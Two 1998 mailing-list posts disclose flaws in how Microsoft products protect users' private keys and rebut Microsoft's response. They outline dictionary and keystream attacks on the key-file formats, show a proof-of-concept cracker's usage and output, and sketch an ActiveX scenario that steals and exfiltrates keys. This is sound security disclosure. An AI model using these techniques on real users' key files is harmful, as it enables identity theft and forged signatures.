3 February 1998: Add update
20 January 1998
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
To: cryptography@c2.net
Subject: [Long] How to recover private keys for various Microsoft products
Cc: cypherpunks@cyberpass.net
Date: Wed, 21 Jan 1998 04:29:26 (NZDT)
How to recover private keys for Microsoft Internet Explorer, Internet
Information Server, Outlook Express, and many others
- or -
Where do your encryption keys want to go today?
Peter Gutmann, <pgut001@cs.auckland.ac.nz>
Summary
-------
Microsoft uses two different file formats to protect users private keys, the
original (unnamed) format which was used in older versions of MSIE, IIS, and
other software and which is still supported for backwards-compatibility reasons
in newer versions, and the newer PFX/PKCS #12 format. Due to a number of
design and implementation flaws in Microsofts software, it is possible to break
the security of both of these formats and recover users private keys, often in
a matter of seconds. In addition, a major security hole in Microsofts
CryptoAPI means that many keys can be recovered without even needing to break
the encryption. These attacks do not rely for their success on the presence of
weak, US-exportable encryption, they also affect US versions.
As a result of these flaws, no Microsoft internet product is capable of
protecting a users keys from hostile attack. By combining the attacks
described below with widely-publicised bugs in MSIE which allow hostile sites
to read the contents of users hard drives or with an ActiveX control, a victim
can have their private key sucked off their machine and the encryption which
"protects" it broken at a remote site without their knowledge.
Once an attacker has obtained a users private key in this manner, they have
effectively stolen their (digitial) identity, and can use it to digitally sign
contracts and agreements, to recover every encryption session key it's ever
protected in the past and will ever protect in the future, to access private
and confidential email, and so on and so on. The ease with which this attack
can be carried out represents a critical weakness which compromises all other
encryption components on web servers and browsers - once the private key is
compromised, all security services which depend on it are also compromised.
A really clever attacker might even do the following:
- Use (say) an MSIE bug to steal someones ActiveX code signing key.
- Decrypt it using one of the attacks described below.
- Use it to sign an ActiveX control which steals other peoples keys.
- Put it on a web page and wait.
On the remote chance that the ActiveX control is discovered (which is extremely
unlikely, since it runs and deletes itself almost instantly, and can't be
stopped even with the highest "security" setting in MSIE), the attack will be
blamed on the person the key was stolen from rather than the real attacker.
This demonstrates major problems in both Microsoft's private key security
(an attacker can decrypt, and therefore misuse, your private key), and ActiveX
security (an attacker can create an effectively unstoppable malicious ActiveX
control and, on the remote chance that it's ever discovered, ensure that
someone else takes the blame).
Background
----------
About a year ago I posted an article on how to break Netscape's (then) server
key encryption to the cypherpunks list (Netscape corrected this problem at
about the same time as I posted the article). However more than a year after
the code was published, and 2 1/2 years after a similar problem with Windows
.PWL file encryption was publicised, Microsoft are still using exactly the
same weak, easily-broken data format to "protect" users private keys. To
break this format I simply dusted off my year-old software, changed the
"Netscape" strings to "Microsoft", and had an encryption-breaker which would
recover most private keys "protected" with this format in a matter of seconds.
In addition to the older format, newer Microsoft products also support the
PKCS #12 format (which they originally called PFX), which Microsoft render as
useless as the older format by employing the RC2 cipher with a 40-bit key. In
a truly egalitarian manner, this same level of "security" is used worldwide,
ensuring that even US users get no security whatsoever when storing their
private keys. However even RC2/40 can take awhile to break (the exact
definition of "a while" depends on how much computing power you have available,
for most non-funded attackers it ranges from a few hours to a few days).
Fortunately, there are enough design flaws in PKCS #12 and bugs in Microsofts
implementation to ensure that we can ignore the encryption key size. This has
the useful - to an attacker - side-effect that even if Microsoft switch to
using RC2/128 or triple DES for the encryption, it doesn't make the attackers
task any more difficult. By combining the code to break the PKCS #12 format
with the code mentioned above which breaks the older format, we obtain a single
program which, when run on either type of key file, should be able to recover
the users private keys from most files in a matter of seconds.
A (somewhat limited) example of this type of program is available in source
code form from http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms.c. Because
it's meant as a proof-of-concept program it's somewhat crude, and restricted to
recovering passwords which are single dictionary words. Note: This does not
mean that using (say) two words as a password instead of one will protect your
private key. All it means is that I haven't bothered to write anything more
sophisticated - no doubt anyone who was serious about this could adapt
something like cracklib's password-generation rules and routines to provide a
more comprehensive and powerful type of attack. Similarly, by making trivial
changes to the key file data format it's possible to fool the program until
someone makes an equally trivial change to the program to track the format
change - this is meant as a demonstrator only, not a do-everything encryption
breaker.
To use the program, compile and invoke it with:
breakms <Microsoft key file> <word list file>
Here's what the output should look like (some of the lines have been trimmed a
bit):
File is a PFX/PKCS #12 key file.
Encrypted data is 1048 bytes long.
The password which was used to encrypt this Microsoft PFX/PKCS #12 file is
'orthogonality'.
Modulus = 00BB6FE79432CC6EA2D8F970675A5A87BFBE1AFF0BE63E879F2AFFB93644D [...]
Public exponent = 010001
Private exponent = 6F05EAD2F27FFAEC84BEC360C4B928FD5F3A9865D0FCAAD291E2 [...]
Prime 1 = 00F3929B9435608F8A22C208D86795271D54EBDFB09DDEF539AB083DA912D [...]
Prime 2 = 00C50016F89DFF2561347ED1186A46E150E28BF2D0F539A1594BBD7FE4674 [...]
Exponent 1 = 009E7D4326C924AFC1DEA40B45650134966D6F9DFA3A7F9D698CD4ABEA [...]
Exponent 2 = 00BA84003BB95355AFB7C50DF140C60513D0BA51D637272E355E397779 [...]
Coefficient = 30B9E4F2AFA5AC679F920FC83F1F2DF1BAF1779CF989447FABC2F5628 [...]
Someone sent me a test Microsoft key they had created with MSIE 3.0 and the
program took just a few seconds to recover the password used to encrypt the
file.
One excuse offered by Microsoft is that Windows NT has access control lists
(ACL's) for files which can be used to protect against this attacks and the one
described below. However this isn't notably useful: Most users will be running
Windows '95 which doesn't have ACL's, of the small remainder using NT most
won't bother setting the ACL's, and in any case since the attack is coming from
software running as the current user (who has full access to the file), the
ACL's have no effect. The ACL issue is merely a red herring, and offers no
further protection.
Further Attacks (information provided by Steve Henson <shenson@bigfoot.com>)
---------------
There is a further attack possible which works because Microsoft's security
products rely on the presence of the Microsoft CryptoAPI, which has a wonderful
function called CryptExportKey(). This function hands over a users private key
to anyone who asks for it. The key is encrypted under the current user, so any
other program running under the user can obtain their private key with a single
function call. For example an ActiveX control on a web page could ask for the
current users key, ship it out to a remote site, and then delete itself from
the system leaving no trace of what happened, a bit like the mail.exe program I
wrote about 2 years ago which did the same thing for Windows passwords. If the
control is signed, there's no way to stop it from running even with the highest
security level selected in MSIE, and since it immediately erases all traces of
its existence the code signing is worthless.
Newer versions of the CryptoAPI which come with MSIE 4 allow the user to set a
flag (CRYPT_USER_PROTECTED) which specifies that the key export function should
be protected with no protection (the default), user notification, or password
protection. However the way this is implemented makes it pretty much useless.
Firstly, if the certificate request script used to generate the key doesn't set
this flag, you end up with the default of "no protection" (and the majority of
users will just use the default of "no protection" anyway). Although Microsoft
claim that "reputable CA's won't forget to set this flag", a number of CA's
tested (including Verisign) don't bother to set it (does this mean that
Microsoft regard Verisign as a disreputable CA? :-). Because of this, they
don't even provide the user with the option of selecting something other than
"no security whatsoever".
In addition at least one version of CryptoAPI would allow the "user
notification" level of security to be bypassed by deleting the notification
dialog resource from memory so that the call would quietly fail and the key
would be exported anyway (this is fairly tricky to do and involves playing with
the CPU's page protection mechanism, there are easier ways to get the key than
this).
Finally, the "password protection" level of security asks for the password a
whopping 16 (yes, *sixteen*) times when exporting the key, even though it only
needs to do this once. After about the fifth time the user will probably click
on the "remember password" box, moving them back to zero security until they
reboot the machine and clear the setting, since the key will be exported with
no notification or password check once the box is clicked.
To check which level of security you have, try exporting your key certificate.
If there's no warning/password dialog, you have zero security for your key, and
don't even need to use the encryption-breaking technique I describe elsewhere
in this article. Any web page you browse could be stealing your key (through
an embedded ActiveX control) without you ever being aware of it.
Details on Breaking the Older Format
------------------------------------
The Microsoft key format is very susceptible to both a dictionary attack and to
keystream recovery. It uses the PKCS #8 format for private keys, which
provides a large amount of known plaintext at the start of the data, in
combination with RC4 without any form of IV or other preprocessing (even though
PKCS #8 recommends that PKCS #5 password-based encryption be used), which means
you can recover the first 100-odd bytes of key stream with a simple XOR (the
same mistake they made with their .PWL files, which was publicised 2 1/2 years
earlier). Although the password is hashed with MD5 (allowing them to claim the
use of a 128-bit key), the way the key is applied provides almost no security.
This means two things:
1. It's very simple to write a program to perform a dictionary attack on the
server key (it originally took me about half an hour using cryptlib,
http://www.cs.auckland.ac.nz/~pgut001/cryptlib/, another half hour to rip
the appropriate code out of cryptlib to create a standalone program, and a
few minutes to retarget the program from Netscape to Microsoft).
2. The recovered key stream from the encrypted server key can be used to
decrypt any other resource encrypted with the server password, *without
knowing the password*. This is because there's enough known plaintext
(ASN.1 objects, object identifiers, and public key components) at the start
of the encrypted data to recover large quantities of key stream. This means
that even if you use a million-bit encryption key, an attacker can still
recover at least the first 100 bytes of anything you encrypt without needing
to know your key (Frank Stevenson's glide.exe program uses this to recover
passwords from Windows .PWL files in a fraction of a second).
The problem here is caused by a combination of the PKCS #8 format (which is
rather nonoptimal for protecting private keys) and the use of RC4 to encryt
fixed, known plaintext. Since everything is constant, you don't even need to
run the password-transformation process more than once - just store a
dictionary of the resulting key stream for each password in a database, and
you can break the encryption with a single lookup (this would be avoided by
the use of PKCS #5 password-based encryption, which iterates the key setup and
uses a salt to make a precomputed dictionary attack impossible. PKCS #5
states that its primary intended application is for protecting private keys,
but Microsoft (and Netscape) chose not to use this and went with straight RC4
encryption instead). This is exactly the same problem which came up with
Microsoft's .PWL file encryption in 1995, and yet in the 2 1/2 years since I
exposed this problem they still haven't learnt from their previous mistakes.
For the curious (and ASN.1-aware), here's what the data formats look like.
First there's the outer encapsulation which Microsoft use to wrap up the
encrypted key:
MicrosoftKey ::= SEQUENCE {
identifier OCTET STRING ('private-key'),
encryptedPrivateKeyInfo
EncryptedPrivateKeyInfo
}
Inside this is a PKCS #8 private key:
EncryptedPrivateKeyInfo ::= SEQUENCE {
encryptionAlgorithm EncryptionAlgorithmIdentifier,
encryptedData EncryptedData
}
EncryptionAlgorithmIdentifier ::= AlgorithmIdentifier
EncryptedData = OCTET STRING
Now the EncryptionAlgorithmIdentifier is supposed to be something like
pbeWithMD5AndDES, with an associated 64-bit salt and iteration count, but
Microsoft (and Netscape) ignored this and used straight rc4 with no salt or
iteration count. The EncryptedData decrypts to:
PrivateKeyInfo ::= SEQUENCE {
version Version
privateKeyAlgorithm PrivateKeyAlgorithmIdentifier
privateKey PrivateKey
attributes [ 0 ] IMPLICIT Attributes OPTIONAL
}
Version ::= INTEGER
PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier
PrivateKey ::= OCTET STRING
Attributes ::= SET OF Attribute
(and so on and so on, I haven't bothered going down any further). One thing
worth noting is that Microsoft encode the AlgorithmIdentifier incorrectly by
omitting the parameters, these should be encoded as a NULL value if there are
no parameters. In this they differ from Netscape, indicating that both
companies managed to independently come up with the same broken key storage
format. Wow.
For people picking apart the inner key, Microsoft also encode their ASN.1
INTEGERs incorrectly, so you need to be aware of this when reading out the
data.
Details on Breaking the PFX/PKCS #12 Format
-------------------------------------------
The PFX/PKCS #12 format is vastly more complex (and braindamaged) than the
older format. You can find an overview of some of the bletcherousness in this
format at http://www.cs.auckland.ac.nz/~pgut001/pfx.html. After Microsoft
originally designed the format (calling it PFX) and presented it to the world
as a fait accompli, cleanup crews from other companies rushed in and fixed some
of the worst problems and security flaws. However by this time Microsoft had
already shipped implementations which were based on the earlier version with
all its flaws and holes, and didn't want to change their code any more. A
side-effect of this was that to be compatible, other vendors had to copy
Microsofts bugs rather than produce an implementation in accordance with the
standard. Newer versions of the standard have now been amended to define the
implementation bugs as a part of the standard.
Anyway, as a result of this it's possible to mount three independant types of
attack on Microsoft's PFX/PKCS #12 keys:
1. Attack the RC2/40 encryption used in all versions, even the US-only one.
2. Attack the MAC used to protect the entire file. Since the same password is
used for the MAC and the encrypted key, recovering the MAC password also
recovers the password used to encrypt the private key. The cleanup crews
added a MAC iteration count to make this attack harder, but Microsoft
ignored it.
3. Attack the private key encryption key directly. Like the MAC's, this also
has an interation count. Microsoft don't use it.
Even if one of these flaws is fixed, an attacker can simply switch over and
concentrate on a different flaw.
I decided to see which one could be implemented the most efficiently.
Obviously (1) was out (you need to perform 2^39 RC2 key schedules on average
to find the key), which left (2) and (3). With the refinements I'm about to
describe, it turns out that an attack on the private key encryption is
significantly more efficient than an attack on the MAC.
To understand how the attack works, you need to look at how PKCS #12 does its
key processing. The original PFX spec included only some very vague thoughts
on how to do this. In later PKCS #12 versions this evolved into a somewhat
garbled offshoot of the PKCS #5 and TLS key processing methods. To decrypt
data which is "protected" using the PKCS #12 key processing, you need to do the
following:
construct a 64-byte "diversifier" (which differs depending on whether you
want to set up a key or an IV) and hash it;
stretch the salt out to 64 bytes and hash it after the diversifier hash;
stretch the password out to 64 bytes (using incorrect processing of the
text string, this is one of Microsofts implementation bugs which has
now become enshrined in the standard) and hash it after the salt hash;
complete the hash and return the resulting value as either the key or the
IV, depending on the diversifier setting;
(it's actually rather more complex than that, this is a stripped-down version
which is equivalent to what Microsoft use).
This process is carried out twice, once for the key and once for the IV. The
hashing is performed using SHA-1, and each of the two invocations of the
process require 4 passes through the SHA-1 compression function, for a total
of 8 passes through the function. Because the PKCS #12 spec conveniently
requires that all data be stretched out to 64 bytes, which happens to be the
data block size for SHA-1, there's no need for the input processing which is
usually required for SHA-1 so we can strip this code out and feed the data
directly into the compression function. Thus the compression function (along
with the RC2 key setup) is the limiting factor for the speed of an attack.
Obviously we want to reduce the effort required as much as possible.
As it turns out, we can eliminate 6 of the 8 passes, cutting our workload by
75%. First, we observe that the the diversifier is a constant value, so
instead of setting it up and hashing it, we precompute the hash and store the
hash value. This eliminates the diversifier, and one pass through SHA-1.
Next, we observe that the salt never changes for the file being attacked, so
again instead of setting it up and hashing it, we precompute the hash and
store the hash value. This eliminates the diversifier, and another pass
through SHA-1.
Finally, all that's left is the password. This requires two passes through
the compression function, one for the password (again conveniently stretched
to 64 bytes) and a second one to wrap up the hashing.
In theory we'd need to repeat this process twice, once to generate the
decryption key and a second time to generate the decryption IV which is used
to encrypt the data in CBC mode. However the start of the decrypted plaintext
is:
SEQUENCE {
SEQUENCE {
OBJECT IDENTIFIER,
...
and the SEQUENCE is encoded as 30 82 xx xx (where xx xx are the length
bytes). This means the first 8 bytes will be 30 82 xx xx 30 82 xx xx, and
will be followed by the object identifier. We can therefore skip the first 8
bytes and, using them as the IV, decrypt the second 8 bytes and check for the
object identifier. This eliminates the second PKCS #12 key initialisation
call which is normally required to generate the IV.
As this analysis (and the program) shows, Microsoft managed to design a
"security" format in which you can eliminate 75% of the encryption processing
work while still allowing an attack on the encrypted data. To make it even
easier for an attacker, they then dumbed the key down to only 40 bits, even in
the US-only version of the software. In fact this doesn't really have any
effect on security, even if they used 128-bit RC2 or triple DES or whatever,
it would provide no extra security thanks to the broken key processing.
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
To: cryptography@c2.net
Subject: An update on MS private key (in)security issues
Date: Wed, 4 Feb 1998 01:36:20 (NZDT)
A fortnight ago I posted a message exposing a number of weaknesses in the way
various Microsoft security products handle users private keys. A few days
before I was due to vanish for a security conference (where it was very
difficult to contact me), the article started getting a bit of attention. This
is a general response which clarifies several issues relating to the original
message.
First, Russ Cooper (moderator of the NT Bugtraq mailing list) made some wildly
inaccurate claims about the article. I've had a bit of feedback which
indicated that it wasn't even worth dignifying this stuff with a response but
I've written one anyway, at least for the original NT Bugtraq messages he
posted (the stuff he put on a web page is just more of the same). You can find
it at http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms2.txt (even if you
don't want to plough through the whole thing, you might want to read the last
two paragraphs for a giggle).
After this, Microsofts spin doctors leaped into action and posted a response to
the article. I've replied to this one in a bit more detail, since it raises
several important issues.
Comments on Microsofts Response
-------------------------------
>Microsoft's Response to Recent Questions on the Recovery of Private Keys from
>various Microsoft Products
>[...]
>With the exception of the details about a possible PKCS-12 attack, all the
>issues raised in the recent discussions are specifically aimed at Microsoft's
>base CSPs, not at CryptoAPI. The base CSPs are the royalty-free,
>software-based CSPs provided with Windows NT 4.0, Windows 95, and Internet
>Explorer. These attacks do not apply in general to other CryptoAPI CSPs and do
>not indicate any fundamental concerns with the security of the CryptoAPI
>architecture or applications built upon it.
This statement is mere obfuscation. As Microsoft have said, every single
(recent) copy of Windows NT, Windows'95, and MSIE (and, presumably, other
products like IIS and Outlook, which rely on them) ship with these CSP's,
therefore every recent system comes with this security hole installed by
default.
In addition, the CryptExportKey() function is a standard CryptAPI function,
which is described by Microsoft with the text "The CryptExportKey function is
used to export cryptographic keys out of a cryptographic service provider in a
secure manner" (obviously some new use of the term "secure" with which I wasn't
previously familiar). There's nothing in there that says "Only the Microsoft
CSP's support this" (some may not support it, but by Microsofts own admission
the default used on any recent system does indeed exhibit this flaw).
>Microsoft products do not "store" private key material using PKCS-12, contrary
>to recent descriptions on the Internet.
I was unfortunately somewhat unclear in my article, I've fixed up the online
version at http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms.txt. To
summarise, if you want to get at an exported key stored on disk, you can use
the pre-4.0 key file/PKCS #12 key file flaws. If you want to get at the
current users key, you can use the CryptExportKey() flaw.
>The example of breaking a PKCS-12 data blob, which was given in discussion on
>the Internet, is not an attack on the "weak" cryptography of PKCS-12. Rather,
>it is simply a dictionary attack (long known and well understood in
>cryptography),
This statement is accurate. As Microsoft have said, dictionary attacks have
been known to the computer industry for a long, long time (several decades).
For example the Unix password encryption uses 25 iterations of DES to protect
users passwords from dictionary attacks (this is rather inadequate now, but was
appropriate more than two decades ago when it was introduced).
If this is a well-known flaw which the entire industry has known about for
decades, why are Microsoft's very latest "security" products so extremely
vulnerable to it? As I mentioned in my writeup, I published an attack on the
exact format used in older MS products more than 1 1/2 years ago, but Microsoft
made no attempt to fix this problem at the time. It wasn't until I published
the current writeup that they finally addressed it.
>One statement by the original poster argues that Microsoft managed to design a
>security format that actually makes it easier to break into the protected
>data. As stated above, a number of well respected companies were involved
>extensively in the design and review of PKCS-12 before it became a standard.
The problem is that Microsoft ignored the other companies recommendations for
increasing security. I'll refer people back to the original writeup for
mention of the various security features which were added to PKCS #12 and
subsequently ignored by Microsoft. PKCS #12 is just a basic modification of
PFX, which was a purely Microsoft invention, and Microsofts implementation of
PKCS #12 does indeed make it very easy to perform the attack I described (you'd
have to read my writeup for the full technical details in which I describe each
individual flaw which, as each is exploited in turn, make it progressively
easier and easier to recover a users private key).
In addition (as I mentioned in my original message), Microsoft use RC2/40 to
encrypt the private keys, which means that no matter how good a password you
choose, the default PKCS #12 format private key produced by MSIE can be
recovered in a few days with fairly modest computing power. There already
exists a Windows screen saver which will recover RC2/40 keys for S/MIME
messages, and the prize of an RSA private key is a much higher motivating
factor than the "Hello, how are you?" typically found in an S/MIME message. As
Microsoft point out, Netscape can indeed handle RC2/40-encrypted files, however
they usually use triple DES and not RC2/40 (they encrypt the private key
components - the really valuable part of the PKCS #12 payload - with triple DES
and the other odds and ends with RC2/40). Since Netscape also iterate the
password and MAC processing, they aren't vulnerable to the attacks which the
Microsoft software is vulnerable to, even though both are based on the same
PKCS #12 standard.
>Exploiting Internet Explorer
>
>One of the fundamental requirements to perform any possible cryptographic
>attack discussed in the recent postings is the assumption that a malicious
>entity could somehow access to data on a user's computer system, without the
>permission or knowledge of the user. This is a large leap of faith.
>
>Users that are using Public Key Certificates today are generally sophisticated
>and savvy users,
Bwahahahahaha!
Sorry, I guess I should explain that in more precise terms. Now I'm not trying
to claim that the average Win95 user isn't as sophisticated and savvy as
Microsoft seem to think, or that relying entirely on the sophistication of the
average Win95 user for security is a dangerous move. However these statements
do seem to completely ignore the reality of the situation. Let me go into the
background of the weaknesses a bit further.
When I tested the weaknesses, I asked some "guinea pig" users to send me their
exported keys, with the promise that I'd destroy the keys and not keep any
record of where the keys came from and so on. Because of this I can't give
exact figures, however here are a few data points:
- More than half the keys (I can't remember the exact figure) were in the
older, pre-4.x format. This indicates that the majority of users (or at
least of the crypto-using guinea pigs) are still running old versions of MSIE
which contain a number of widely-publicised problems, including precisely the
weaknesses required to run arbitrary code on the machine or read files off
the machine. One of the respondents commented that the key was "the key I
use with Outlook", I'm not sure what that says about the origins of the key.
Another key was one used with IIS for a web site which runs an online
commerce service that processes credit-card based orders. This must have
been an older version of IIS since the key was in the pre-4.x format.
- When I asked two of the people why they were still using an old version, the
responses were "It came installed with the machine when we bought it" and "It
does what I want, so I haven't upgraded". I expect most users of the older
version would have a similar reason for using it.
In a company of 20 people (some of whom participated in this test), only two
were running 4.x. These people are all highly competent software developers
(presumably this includes them in the group of "sophisticated and savvy
users" which MS were referring to), however none of the remaining 18 wanted
to risk installing MSIE 4 because of the extent with which it messed with
their system, possibly jeopardising their development work. Therefore most
of these "sophisticated and savvy users" were still running old, insecure
versions of MSIE, and weren't going to upgrade any time soon.
- For the two remaining 4.x users in the company, both are still using
straight, unpatched 4.0 because they considered it painful enough to download
all of 4.0 and they didn't want to bother with an upgrade just yet. This
makes them vulnerable to the bug pointed out in the l0pht advisory.
- When I informed one of the guinea pigs of the recovered password, his
response was "Now I'll have to change my login password" (the others
generally restricted themselves to some variation of "Oops"). This comment
confirms that users do indeed sometimes use their login password to protect
their private keys, so that a successful attack recovers not only their
private keys but their login password as well.
- One respondent commented that most of the code they downloaded from the net
was unsigned, but they ran it anyway. This is probably typical of the
average user.
Although I've only been back for two days, I haven't yet managed to find anyone
who has applied all the latest patches and kludges to their system which makes
them immune to these problems. This includes at least one person who has a
code signing key which could be used to sign malicious ActiveX controls.
Therefore all of the guinea pigs could in theory have their private keys
stolen.
>Attacks against Authenticode signing keys
>
>[...]
>
>However, it is extremely unlikely anyone could be successful with a simplistic
>strategy for stealing Authenticode signing keys and then using them.
See my comments about about this. I could, right now, obtain at least one
Authenticode signing key with which I could create a malicious ActiveX control.
I'm sure that if I were serious about this I could obtain a number of others.
>Second, anyone signing code using Authenticode technology is extremely
>unlikely to leave their key material sitting on an end user machine routinely
>used for browsing the Internet.
I see no basis for this claim. Every developer I know uses the same machine
for both code development and web browsing (in fact a number of users keep a
copy of MSIE or Netscape permantly running on their machine so that they'll
have something to do between compiles). Microsoft's statement seems to imply
that users will be running two machines, one dedicated entirely to web browsing
and the other to code signing. I find this extremely unlikely.
>Attacks on Encrypted Key material
>
>There is some confusion over the algorithms and methods that Microsoft uses to
>provide protection of encrypted key material in Internet Explorer when using
>the standard Microsoft base CSPs. There were changes between Internet Explorer
>3.0x and Internet Explorer 4.x specifically to address any possible concern.
And the astounding thing was that, despite a complete rewrite of the code, the
newer version offers no extra security at all, as my article points out. Both
are equally weak, you just need to attack them in slightly different ways.
>Key export attacks
>
>The original Internet posting raises concern about the CryptoAPI interface
>CryptExportKey(). This function is fully documented and does indeed export
>private key material in an encrypted format.
The statement from Microsoft omits one important point here. Myself and
another security researcher have been trying to tell Microsoft for more than
four months (probably a lot longer, I didn't log the earlier mail) that this is
a very serious security flaw. In all cases Microsoft's response was some
variation of "We don't see this as a flaw". It wasn't until my warning was
published that they finally addressed the problem, and even in this case (the
program to set the CRYPT_USER_PROTECTED flag) it's only a quick hack to plaster
over the cracks and allow them to declare the problem fixed. In fact it
doesn't fix the problem at all. I'll post details in a fortnight or so when
I've had time to test things, please don't ask me about this until then.
>The presence of the CryptExportKey() function is to support functionality such
>as migrating key material between machines for a user or creating a backup
>copy of a key. It should be noted however, that many CSPs, including most
>hardware based CSPs, do not allow exportable private keys and will return and
>error in response to a CryptExportKey() request.
However the CSP's installed by default on every recent system do allow the
export. The fact that there may exist, somewhere, an implementation which
doesn't exhibit this flaw really doesn't help the majority of users.
>The posting also asserts that an ActiveX control could be downloaded from a
>web page, simply ask for the current users key, ship the key off for
>collection by an unscrupulous person, and then delete itself without a trace.
>
>If users run unsigned code, or code from an unknown origin, a number of
>unpleasant things can happen. This could indeed occur if the key as been
>marked exportable and the CRYPT_USER_PROTECTED flag is not set.
Which was, until my warning, the automatic default action for Verisign, and is
still the automatic default for many other CA's. This means that keys
generated right up until a few days ago (and in some cases keys being generated
right now) have, by default, no protection whatsoever. In addition I've just
been sent mail to say that CRYPT_USER_PROTECTED still isn't the default with
Verisign, you have to click a box asking for extra security or you get the
usual default of no protection.
To add to the confusion, a lot of documentation (including the Microsoft
Developer Network (MSDN) online documentation on Microsofts web site) describes
the CRYPT_USER_PROTECTED flag with "The Microsoft RSA Base Provider ignores
this flag", which can cause programmers to leave it out when it is *essential*
it is always included. Incidentally, MSDN also claims that Microsoft are
"supporting" PFX, which is in direct contrast with the claims in their press
release.
>There was also discussion of 16 dialog boxes appearing to the user for their
>password if the CRYPT_USER_PROTECTED flag is set. Certainly asking the user
>too many times would be better than too few times, however in our tests, under
>extreme (and uncommon cases), a user might be asked for their password at most
>four times when a key is used with the Microsoft base CSPs. Perhaps the claim
>came from an early beta release.
The 16 dialog boxes problem was present in 4.0, and it's been confirmed as
still being present in 4.01. This was apparently verified on Microsoft's own
CryptoAPI mailing list (the claimed "beta" version was actually MSIE 4.0
final).
>Microsoft is constantly working to improve the security of our products.
Myself and another person had been trying to convince Microsoft for more than
four months that things like CryptExportKey() are a major security hole. Their
response each time has been some variation of "We don't see this as a problem".
It simply wasn't possible to get them to acknowledge these flaws, therefore my
posting of the details wasn't "irresponsible" (as some have claimed) but a
necessity in order to get them fixed. When I pointed out several months ago
that Microsoft were using, in their pre-4.x products, an exported key format
which was identical to the one which I broke more than 1 1/2 years ago, their
response was "What's the problem with this?". I would have liked to have
included URL's for the CryptoAPI mailing list archives to prove that Microsoft
were warned of these problems some time ago, but the CryptoAPI archive seems to
be temporarily offline.
Risks of a Private Key Compromise
---------------------------------
One or two respondents have tried to play down the seriousness of a private key
compromise, saying that I exaggerated the dangers in my original message. What
I wanted to point out was how extremely valuable a users private key is, and
how disappointingly little concern Microsoft seem to have for protecting this
valuable resource. For example Garfinkel and Spaffords "Web Security and
Commerce" (O'Reilly, 1997) contains the warning:
"Today's PC's are no better at storing private keys once they have been
generated. Even though both Navigator and Internet Explorer can store keys
encrypted, they have to be decrypted to be used. All an attacker has to do
is write a program that manages to get itself run on the users computer (for
example by using [...] Microsoft's ActiveX technology), waits for the key to
be decrypted, and then sends the key out over the network" (p.120).
Including a function like CryptExportKey() (which hands over a users private
key) makes this very attack possible. The potential damage which can be caused
with a misappropriated private key is enormous. Consider the relative risks in
the compromise of a logon password and a private key. With a logon password,
the worst an attacker can do (apart from stealing possibly valuable data) is to
trash the victims hard drive, which involves reinstalling the operating system
(an action which many users are intimately familiar with). In contrast an
attacker who obtains a private key can potentially drain the victims credit
card, clean out their bank account (if the victim uses one of the emerging
online banking services), sign documents in their name, and so on.
The implications of that last point can be quite serious. Take for example the
Utah digital signature act, which was used as a model by a number of other
states who implemented or are implementing digital signature legislation.
Under the Utah act, digitally signed documents are given the same evidentiary
weight as notarised documents, and someone trying to overcome this has to
provide "clear and convincing evidence" that the document is fraudulent, which
is difficult since it bears a valid signature from the users key (this fact has
been used in the past to criticise digital signature laws based on this act).
In addition, under the Utah act and derived acts, anyone who loses their
private key bears unlimited liability for the loss (in contrast, consumer
liability for credit card loss is limited to $50). This leads to the spectre
of a malicious attacker who has the ability to issue notarised documents in
your name for which you carry unlimited liability. This is a lot more
important than someone reformatting your hard drive, or stealing last months
sales figures.
Peter.